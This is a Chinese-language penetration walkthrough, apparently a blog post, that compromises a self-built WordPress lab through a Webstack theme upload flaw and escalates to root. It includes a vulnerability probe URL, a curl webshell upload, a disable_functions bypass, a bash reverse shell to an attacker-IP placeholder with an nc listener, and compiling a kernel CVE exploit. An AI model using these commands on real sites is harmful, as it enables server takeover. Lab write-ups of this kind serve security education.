前段时间Webstack写马漏洞公开渗透思路如下从webstack写马→蚁剑连接→绕过disable_functions→nc反弹→exp提权实操开始靶场我用自建WordPress要看一个webstack站点有没有漏洞可以访问wp-admin/admin-ajax.php?actionimg_upload路径如果显示0如图那十有八九就是有这个漏洞开始写马在当前目录下创建好木马php文件然后运行命令上传木马curl -F filesshell.php https://目标站点/wp-admin/admin-ajax.php?actionimg_upload如图返回上传成功和木马地址直接访问木马地址显示白页说明木马正常可用蚁剑连接测试连接显示成功然后直接添加然后打开虚拟终端发现任何命令都无法执行原因是禁用了函数这里需要用到蚁剑插件绕过 disable_functions使用蚁剑绕函数插件靶场php版本为8.1选择对应模式点击开始发现命令可成功执行接下来就直接开始反弹了Bash反弹蚁剑虚拟终端靶机运行bash -i /dev/tcp/攻击机IP/4444 01攻击机运行nc -lvnp 4444用来监听4444端口此处需攻击机先监听端口靶机再执行反弹命令反弹连接成功执行cat /etc/os-release命令看看操作系统发现是乌班图26系统然后执行lsmod | grep rds命令发现模块也开启了刚好可以复现CVE-2026-43494开始测试通过蚁剑上传poc然后运行gcc -O CVE-2026-43494.c -o exp编译poc运行命令file exp看看文件编译成功没看得到exp文件是编译成功开始提权直接运行./exp出现如图不报错等待一会直接whoami查看当前用户显示root用户输入id回车也是root用户至此整场渗透结束结束语最后请大家多注重网络安全及时更新内核补丁防患于未然。
